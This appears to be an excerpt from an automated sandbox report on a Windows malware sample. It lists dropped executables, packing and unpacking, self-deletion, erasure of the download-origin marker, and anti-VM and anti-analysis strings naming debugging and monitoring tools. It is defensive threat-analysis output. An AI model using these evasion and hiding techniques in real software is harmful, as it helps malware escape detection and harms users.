Source:	Binary string: wkernelbase.pdb source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdb source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mpr.pdb source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdb source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wsspicli.pdbGCTL source: fontview.exe, 0000000D.00000003.524283148.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wwin32u.pdb source: fontview.exe, 0000000D.00000003.529166790.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: shlwapi.pdbUGP source: fontview.exe, 0000000D.00000003.529256728.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: setupapi.pdb source: fontview.exe, 0000000D.00000003.564997815.0000000005178000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.567165020.00000000055B0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: 3C:\nujiwucosunes\vezik.pdb` source: explorer.exe, 00000003.00000003.463370159.0000000006570000.00000004.00000001.00020000.00000000.sdmp, 43D0.exe, 00000008.00000002.477465572.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 00000008.00000000.462284028.0000000000401000.00000020.00000001.01000000.00000008.sdmp, 43D0.exe, 0000000A.00000000.475726435.0000000000401000.00000020.00000001.01000000.00000008.sdmp
Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: 43D0.exe, 00000008.00000002.479914181.0000000004980000.00000040.00001000.00020000.00000000.sdmp, 43D0.exe, 0000000A.00000002.481185705.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: combase.pdbUGP source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ucrtbase.pdbUGP source: fontview.exe, 0000000D.00000003.526678012.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.526108390.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: fontview.exe, 0000000D.00000003.516786735.0000000004F75000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.518946338.0000000005160000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdbUGP source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wuser32.pdbUGP source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shell32.pdbUGP source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: fltLib.pdbGCTL source: fontview.exe, 0000000D.00000003.557086498.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wimm32.pdbUGP source: fontview.exe, 0000000D.00000003.557166889.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: WINMMBASE.pdb source: fontview.exe, 0000000D.00000003.562076898.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comdlg32.pdb source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdbUGP source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdb source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdb source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: comdlg32.pdbUGP source: fontview.exe, 0000000D.00000003.533865783.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.533344603.0000000004C4D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wgdi32full.pdb source: fontview.exe, 0000000D.00000003.525163286.0000000004FEC000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.524730073.0000000004CC4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: shcore.pdbUGP source: fontview.exe, 0000000D.00000003.535582414.0000000004C45000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mpr.pdbUGP source: fontview.exe, 0000000D.00000003.569388235.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdb source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: XAMLHostHwndvolumelabelmasteredudfhelpJOLIETUDFData\Program Files\$Windows.~BT\Windows\ProgramData\Program Files (x86)\Program Files\Data\Windows\Data\ProgramData\Data\Program Files (x86)\.cer.cdxml.cat.automaticdestinations-ms.appxpackage.appxbundle.appxWindows.old\.fon.etl.efi.dsft.dmp.customdestinations-ms.cookie.msm.msip.mpb.mp.p12.p10.otf.ost.olb.ocx.nst.mui.pdb.partial.p7x.p7s.p7r.p7m.p7c.p7b.psf.psd1.pfx.pfm.pem.ttc.sys.sst.spkg.spc.sft.rll.winmd.wim.wfs.vsix.vsi.vmrs.vmcxWININET.xap%s (%d).%s\shellIfExecBrowserFlagsft%06dNeverShowExtAlwaysShowExtTopicL source: fontview.exe, 0000000D.00000003.543911919.00000000064F0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.541667280.0000000005177000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: fontview.exe, 0000000D.00000002.574375673.0000000004DE0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.511481087.0000000004C44000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.510890139.0000000004C46000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\fepovilorefego5.pdb source: explorer.exe, 00000003.00000003.445965683.0000000004AC0000.00000004.00000001.00020000.00000000.sdmp, C676.exe, 00000006.00000000.445306622.0000000000401000.00000020.00000001.01000000.00000006.sdmp, C676.exe.3.dr
Source:	Binary string: ole32.pdbUGP source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\xayagejutuximo.pdb source: file.exe, beirutt.3.dr
Source:	Binary string: winmm.pdb source: fontview.exe, 0000000D.00000003.561765846.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdbUGP source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: powrprof.pdb source: fontview.exe, 0000000D.00000003.556519697.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wmswsock.pdb source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ole32.pdb source: fontview.exe, 0000000D.00000003.559665938.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.557527438.0000000004C40000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdbUGP source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: sechost.pdbUGP source: fontview.exe, 0000000D.00000003.522483287.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbGCTL source: fontview.exe, 0000000D.00000003.515386318.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.514698930.0000000004C4C000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdbUGP source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: Kernel.Appcore.pdb source: fontview.exe, 0000000D.00000003.550884226.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: psapi.pdb source: fontview.exe, 0000000D.00000003.564929757.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msvcp_win.pdbUGP source: fontview.exe, 0000000D.00000003.525933343.0000000004C40000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000002.581848569.0000000004F70000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: advapi32.pdbUGP source: fontview.exe, 0000000D.00000003.521207061.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cryptbase.pdb source: fontview.exe, 0000000D.00000003.524332169.0000000004B20000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdbUGP source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: bcryptprimitives.pdb source: fontview.exe, 0000000D.00000003.524433598.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: cfgmgr32.pdb source: fontview.exe, 0000000D.00000003.546083701.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: combase.pdb source: fontview.exe, 0000000D.00000003.531161871.00000000053E0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.529637383.0000000005173000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: profapi.pdbUGP source: fontview.exe, 0000000D.00000003.551602215.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wmswsock.pdbUGP source: fontview.exe, 0000000D.00000002.573666518.0000000004B40000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.569483421.0000000004C40000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: oleaut32.pdb source: fontview.exe, 0000000D.00000003.563958937.0000000004CF0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.562324690.0000000004C4F000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: TC:\xayagejutuximo.pdb$~B\|.@ source: file.exe, beirutt.3.dr
Source:	Binary string: wuser32.pdb source: fontview.exe, 0000000D.00000003.528194183.0000000005170000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.527333609.0000000004C49000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: comctl32.pdb source: fontview.exe, 0000000D.00000003.552104294.0000000005172000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 0000000D.00000003.554344562.0000000005380000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ws2_32.pdbUGP source: fontview.exe, 0000000D.00000003.564725237.0000000004C40000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\C676.exe	Unpacked PE file: 6.2.C676.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Unpacked PE file: 10.2.43D0.exe.400000.0.unpack

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.data:W;.juv:R;.rur:R;.cenepem:W;.rsrc:R;.reloc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Unpacked PE file: 6.2.C676.exe.400000.0.unpack .text:ER;.data:W;.huxuho:R;.gini:R;.vab:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Unpacked PE file: 10.2.43D0.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040E378 push eax; ret	0_2_0040E396
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B6DDC push 6700D42Eh; retf	0_2_007B6DE6
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_007B5F84 push 623D8A45h; retf	0_2_007B5F89
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004363BD push esi; ret	6_2_004363C6
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_004139F8 push ecx; ret	6_2_00413A0B
Source: C:\Users\user\AppData\Local\Temp\C676.exe	Code function: 6_2_006AC6A8 pushad ; ret	6_2_006AC6AA
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_004051E9 push ecx; ret	7_2_004051FC
Source: C:\Users\user\AppData\Roaming\beirutt	Code function: 7_2_0040E378 push eax; ret	7_2_0040E396

Source: C:\Users\user\AppData\Roaming\beirutt

Code function: 7_2_0040A2E2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

7_2_0040A2E2

Source: file.exe	Static PE information: section name: .juv
Source: file.exe	Static PE information: section name: .rur
Source: file.exe	Static PE information: section name: .cenepem
Source: C676.exe.3.dr	Static PE information: section name: .huxuho
Source: C676.exe.3.dr	Static PE information: section name: .gini
Source: C676.exe.3.dr	Static PE information: section name: .vab
Source: beirutt.3.dr	Static PE information: section name: .juv
Source: beirutt.3.dr	Static PE information: section name: .rur
Source: beirutt.3.dr	Static PE information: section name: .cenepem
Source: 4434343.dll.9.dr	Static PE information: section name: .00cfg

Source: initial sample	Static PE information: section name: .text entropy: 7.880058673023214
Source: initial sample	Static PE information: section name: .text entropy: 7.648160210316085

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\beirutt

Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\43D0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	File created: C:\Users\user\AppData\Local\Temp\4434343.dll	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\beirutt	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C676.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\C4AA.exe	Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\file.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\beirutt:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\C4AA.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\43D0.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\fontview.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: 0000000D.00000003.510365391.0000000003056000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.573423971.0000000004AD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: C4AA.exe, 00000009.00000002.581264787.0000000002D80000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: DLLREGISTERSERVERWKANIMHDMAWWV3SZQXYVBUPQC78ZCSCYZEXUSDVMOYWFSOSYSANDBOXK5IQR5XKKHFI0OIXFMGQKSOZVXBFCBSXP0CQKIPRNCYQHM3WLLXT6CDBBS26ESKV7845SWCP2EBLGWHVHDTWSOGZ9U9CGZZSDH2UM9TZTCXYZLXSGKNIDIWISTXFFJPSHTTP://GEKJEGOUDN6I5FBCES.JOMF6MTOBKL32EAI1QWQXSXPNFYV2SMICROSOFT BASIC DISPLAY ADAPTERAPXALPLEWOMRTXOQBIS5VVQOZJTDWDYPDWOJSVZO2QACQSIOYXZAFZ3U9IKX2BQN6EZZOXJP5PSUZKQMTGHZQELR5EG7GRIMERCTFOUNCFE4BGUM7H3R60PJIOCTMJ0M%LS\%D.DLLQU673JXMPB9XS6BLT0XDS1ALT0EJ5HLLAKOWFXNBJFIIOLTKI8WPBYDTNFYR40QJP9YSA5NKHRYBKS7IXE6TWUFX1EVDSUKHNIFAX TEGAWO NIP XEHN9YXFM4WGP9YUO5HXPMC4XQ1BZLDJLNGVBOXTRAY.EXEVMWARETRAY.EXEWECHAT.EXEVMWAREUSER.EXEFIDDLER.EXEPROCESSHACKER.EXEQQ.EXEPROCEXP.EXERDPCLIP.EXEWIRESHARK.EXEKAWEXI GEQUECI BOVOJ.EXEVBOXSERVICE.EXEVGAUTHSERVICE.EXEVMTOOLSD.EXEPRL_CC.EXEHTTPDEBUGGERUI.EXEHTTPANALYZERSTDV7.EXEPROCEXP64.EXE9VCQBULREEOHDRQECLOUDSAFELINEYQ7T94QZPUDEORTE80URPBYHQ3908APEYCDDGGZJIPRJTKOE8J4WDLLBX1APOW9EVBZ1UO2T2UBMGTUDBSQDYJSBALF5CGVCSFIMBSIBECUOLZPCIK2VP28IR0VTY4TBDYVLFRSD5XNE93CYIIGVV5KBWQ4W2ROU3OQVPIRDLVGRVMVTMQRP5J7SUNTW6WJSCCDMAYGHINOZWAXRSZKCI5FN6D9Y9HJRZHIX2JJ5NDQDFLBQ7GSN9CORX41KRUAQXIHNEOIQB1VONHHQFPG6N3LIJPAESKGQBMH2WFPZKMIH3JPNW2WWL4QOWW0SAVLN7QPQACULBYLOPUMLDJFMGRXYRKQKOVNJKRD4PQP2PQ8FNC7JABGGRSW4W0K7VSSICQYE9JT8N0NVH1MITQSNOGZQBXMIJYLHV2DLCZJ486OVC7EHTPLWZ4NT1DG4JSQGYZCQBMR6MBLZRXJGOXTXCYOA7FBPN0EGH7EX8DG8NSYCSAOGD5G0NV7R0LVA09KGCAWTJO5TB2I2LHAGZRMZ4T0EPASO079GSLJNUY5E4DLIUTNFLXFUZSNAEVRRIGWCHIYUGQ9HHPQODBLBIAQMME3ZWAAGKEJB4GPXYSRTR5EFN43BBTXITK2KKFOG8JCARLOY8GS3RRVRRJNAUFJSZGAKWZM2DEQ8OCWPZQ6O4RIWMRY77FLBKVUSFEYWTPB6Y2CTOYPQLWYAQAY5DNDXG1BSVPPP4JQ5WXP1OQ3Y3DHBZRC5X4KW1CN7YJDB9J450JE0S2RDQL7GXWP4ZKMA4WMYVM2YZR24ZUIL8P9X5RU6F5F2HM4YAEQ4STV1PKJ0
Source: file.exe, 00000000.00000002.397065443.0000000000798000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ASWHOOK760H

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\file.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
